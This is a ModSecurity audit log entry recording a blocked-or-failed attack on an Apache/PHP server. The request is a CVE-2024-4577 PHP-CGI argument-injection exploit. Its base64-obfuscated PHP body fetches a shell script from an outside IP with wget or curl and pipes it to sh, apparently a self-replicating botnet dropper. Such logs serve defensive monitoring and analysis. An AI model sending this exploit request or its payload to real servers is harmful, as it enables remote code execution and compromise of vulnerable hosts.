File: //var/lib/modsecurity/audit/20260121/20260121-2335/20260121-233513-aXGpAbhenDUAABZOZbkAAAAh
--946bd71d-A--
[21/Jan/2026:23:35:13 --0500] aXGpAbhenDUAABZOZbkAAAAh 154.221.25.248 55690 127.0.0.3 80
--946bd71d-B--
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
X-Real-IP: 154.221.25.248
Host: 184.94.156.59
Connection: close
Content-Length: 241
Upgrade-Insecure-Requests: 1
Accept: */*
User-Agent: libredtail-http
Content-Type: application/x-www-form-urlencoded
--946bd71d-C--
<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTc4LjE2LjU1LjIyNC9zaCB8fCBjdXJsIC1zayBodHRwczovLzE3OC4xNi41NS4yMjQvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw")); echo(md5("Hello CVE-2024-4577")); ?>
--946bd71d-F--
HTTP/1.1 500 Internal Server Error
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1
--946bd71d-E--
--946bd71d-H--
Apache-Error: [file "core.c"] [line 3157] [level 3] Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
Apache-Handler: redirect-handler
Stopwatch: 1769056513738107 834 (- - -)
Stopwatch2: 1769056513738107 834; combined=61, p1=48, p2=6, p3=4, p4=1, p5=1, sr=29, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 200911012341.
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.2k-fips PHP/5.3.29 mod_fastcgi/2.4.6
Engine-Mode: "ENABLED"
--946bd71d-Z--